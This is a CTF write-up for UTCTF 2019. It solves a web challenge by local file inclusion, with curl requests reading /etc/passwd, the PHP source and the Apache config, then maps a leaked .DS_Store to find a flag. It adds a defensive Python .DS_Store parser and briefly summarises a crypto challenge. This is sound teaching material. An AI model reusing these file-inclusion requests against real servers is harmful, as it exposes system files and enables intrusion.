CTF
Name : UTCTF 2019
Website : isss.io
Type : Online
Format : Jeopardy
CTF Time : link
650 - HabbyDabby's Secret Stash - Web
HabbyDabby's hidden some stuff away on his web server that he created and wrote from scratch on his Mac. See if you can find out what he's hidden and where he's hidden it!
http://a.goodsecurity.fail/
by copperstick6
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>Locked Away</title>
  <meta name="description" content="">
  <meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<style>
  body {
    background-color: #62C2C5;
  }
</style>
<body>
  <h1>Welcome to HabbyDabby's Secret Stash</h1>
  <h2>You'll never get our secrets!</h2>
  <div style="visibility: hidden; display:inline;">
    <form method="get">
      <select name="file">
        <option value="english.html">English</option>
        <option value="french.html">French</option>
      </select>
      <input type="submit">
    </form>
  </div>
</body>
</html>
So there is a hidden form. We can call http://a.goodsecurity.fail/?file=english.html for example, which answers "You'll never get our secrets!".
That sounds like an LFI (Local File Inclusion).
$ curl http://a.goodsecurity.fail/?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
Let's look at the source code with curl 'http://a.goodsecurity.fail/?file=index.php':
<?php
if (isset($_GET['file'])) {
    $file = $_GET['file'];
    if (!file_exists($file)) die("File not found");
    if ($file === "english.html" || $file === "french.html") {
        echo file_get_contents($_GET['file']);
    }
    else {
        // Force the download
        header("Content-Disposition: attachment; filename=" . basename($file));
        header("Content-Length: " . filesize($file));
        header("Content-Type: application/octet-stream;");
        readfile($file);
    }
}
else {
    echo file_get_contents("index.html");
}
?>
Note that the only check is file_exists(): the comparison against the two expected names merely decides between inline display and a forced download, so any path the web server user can read is returned. Apart from that, nothing unusual; everything looks like the default files of a Debian 9 install:
curl 'http://a.goodsecurity.fail/?file=/etc/apache2/sites-enabled/000-default.conf'
<VirtualHost *:80>
ServerAdmin contact@isss.io
ServerName localhost
DocumentRoot /var/www/site
<Directory /var/www/site/>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order deny,allow
Allow from all
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
The description talks about a Mac, so I thought about __MACOSX and .DS_Store.
curl 'http://a.goodsecurity.fail/?file=.DS_Store' --output output
Let's try the excellent tool ds_store_exp, which parses .DS_Store files and downloads the listed files recursively:
$ python2 ds_store_exp/ds_store_exp.py 'http://a.goodsecurity.fail/.DS_Store'
[+] http://a.goodsecurity.fail/.DS_Store
[+] http://a.goodsecurity.fail/e/.DS_Store
[+] http://a.goodsecurity.fail/index.html
[+] http://a.goodsecurity.fail/a
[+] http://a.goodsecurity.fail/e/d/.DS_Store
[+] http://a.goodsecurity.fail/e/d/e/.DS_Store
[+] http://a.goodsecurity.fail/e/d/e/flag.txt
$ curl http://a.goodsecurity.fail/e/d/e/flag.txt
utflag{mac_os_hidden_files_are_stupid}
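To see exactly what a forgotten .DS_Store discloses, here is an added Python example (not from the write-up and not ds_store_exp's code) that recovers file names from the raw bytes by scanning for record markers instead of walking the B-tree; the subset of structure IDs and the sample bytes are constructed for the example, so a defender can run it over a file found in a web root before deciding whether the exposure matters.

```python
import struct

# Structure IDs seen in .DS_Store records. Assumption: this subset is enough for
# a heuristic scan; Apple uses more, and unknown ones are simply not matched.
STRUCT_IDS = (b"Iloc", b"bwsp", b"lsvp", b"lsvP", b"icvp", b"dilc", b"dscl",
              b"fwi0", b"fwsw", b"fwvh", b"BKGD", b"ICVO", b"vSrn", b"vstl")
DATA_TYPES = (b"long", b"shor", b"bool", b"blob", b"type", b"ustr", b"comp", b"dutc")


def ds_store_names(data: bytes, max_name_chars: int = 255) -> list:
    """Recover the file names a .DS_Store discloses, without walking its B-tree.

    Each record is: uint32 BE name length (UTF-16 code units), the name in
    UTF-16BE, a 4-byte structure ID (e.g. b"Iloc") and a 4-byte data type.
    The scan anchors on every ID+type pair and walks backwards until it finds
    a length field that exactly covers the bytes in between.
    """
    names = []
    for sid in STRUCT_IDS:
        for dtype in DATA_TYPES:
            marker = sid + dtype
            pos = data.find(marker)
            while pos != -1:
                for n in range(1, max_name_chars + 1):
                    start = pos - 2 * n - 4
                    if start < 0:
                        break
                    if struct.unpack(">I", data[start:start + 4])[0] == n:
                        name = data[start + 4:pos].decode("utf-16-be", "replace")
                        if name not in names:
                            names.append(name)
                        break
                pos = data.find(marker, pos + 1)
    return sorted(names)


def record(name: str, sid: bytes, dtype: bytes, payload: bytes) -> bytes:
    """Build one record in the on-disk layout (only used for the constructed sample)."""
    enc = name.encode("utf-16-be")
    return struct.pack(">I", len(enc) // 2) + enc + sid + dtype + payload


# Constructed sample: the record region of a .DS_Store for a directory holding
# the entries from the write-up; header and buddy allocator are left out
# because the scanner never needs them.
ILOC = struct.pack(">I", 16) + b"\x00" * 16  # "blob" data: length + bytes
SAMPLE = (b"\x00" * 16
          + record("e", b"Iloc", b"blob", ILOC)
          + record("index.html", b"Iloc", b"blob", ILOC)
          + record("a", b"Iloc", b"blob", ILOC)
          + record("e", b"dscl", b"bool", b"\x01"))  # second "e" record is deduplicated

if __name__ == "__main__":
    print(ds_store_names(SAMPLE))  # ['a', 'e', 'index.html']
```

Point it at a real file with ds_store_names(open(".DS_Store", "rb").read()); names of entries that exist only in the .DS_Store and not on the server are still leaked, which is why the file should never be deployed.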
200 - [basics] crypto - Crypto
Can you make sense of this file?
by balex
TL;DR:
1. Binary to ASCII
2. Base64 decode
3. Caesar cipher with a shift of 10
4. Alphabetical substitution
You can use https://cryptii.com/ or CLI.
utflag{3ncrypt10n_15_c00l}
The hardest part is to get the scoreboard alive to submit the flag.
Note: 0% real life but it is a starter challenge so I guess it is ok.